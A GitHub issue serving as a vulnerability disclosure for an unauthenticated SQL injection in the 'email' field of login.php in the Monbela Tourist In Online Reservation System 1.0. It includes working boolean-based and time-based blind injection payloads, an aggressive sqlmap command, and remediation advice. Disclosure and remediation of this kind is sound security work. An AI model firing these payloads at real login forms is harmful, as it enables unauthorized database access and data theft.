Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Itsourcecode Monbela Tourist In Online Reservation System Using PHP 1.0 login.php SQL injection #3

Open
wangyuan-ui opened this issue Jun 18, 2024 · 0 comments

Comments

@wangyuan-ui
Copy link
Owner

Itsourcecode Monbela Tourist In Online Reservation System Using PHP 1.0 login.php SQL injection

NAME OF AFFECTED PRODUCT(S)

  • Monbela Tourist In Online Reservation System Using PHP

Vendor Homepage

AFFECTED AND/OR FIXED VERSION(S)

submitter

  • wangyuan-ui

Vulnerable File

  • login.php

VERSION(S)

  • V1.0

Software Link

PROBLEM TYPE

Vulnerability Type

  • SQL injection

Root Cause

  • A SQL injection vulnerability was found in the 'login.php' file of the 'Monbela Tourist In Online Reservation System Using PHP' project. The reason for this issue is that attackers inject malicious code from the parameter "email" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.

Impact

  • Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.

DESCRIPTION

  • During the security review of "Monbela Tourist In Online Reservation System Using PHP", wangyuan-ui discovered a critical SQL injection vulnerability in the "login.php" file. This vulnerability stems from insufficient user input validation of the 'email' parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.

No login or authorization is required to exploit this vulnerability

Vulnerability details and POC

Vulnerability type:

  • boolean-based blind
  • time-based blind

Vulnerability location:

  • 'email' parameter

Payload:

    email=111' AND 5012=(SELECT (CASE WHEN (5012=5012) THEN 5012 ELSE (SELECT 3533 UNION SELECT 3176) END))-- LJmv&pass=111&btnlogin=

    email=111' AND (SELECT 4462 FROM (SELECT(SLEEP(5)))aBAN)-- LtcY&pass=111&btnlogin=
    Parameter: email (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: email=111' AND 5012=(SELECT (CASE WHEN (5012=5012) THEN 5012 ELSE (SELECT 3533 UNION SELECT 3176) END))-- LJmv&pass=111&btnlogin=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=111' AND (SELECT 4462 FROM (SELECT(SLEEP(5)))aBAN)-- LtcY&pass=111&btnlogin=
  • 1

The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:

    python sqlmap.py -u "http://localhost:8103/admin/login.php" --data="email=111&pass=111&btnlogin=" --method=POST --level=5 --risk=3 --batch --dbs
  • 2

Suggested repair

  1. Use prepared statements and parameter binding:
    Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.

  2. Input validation and filtering:
    Strictly validate and filter user input data to ensure it conforms to the expected format.

  3. Minimize database user permissions:
    Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.

  4. Regular security audits:
    Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant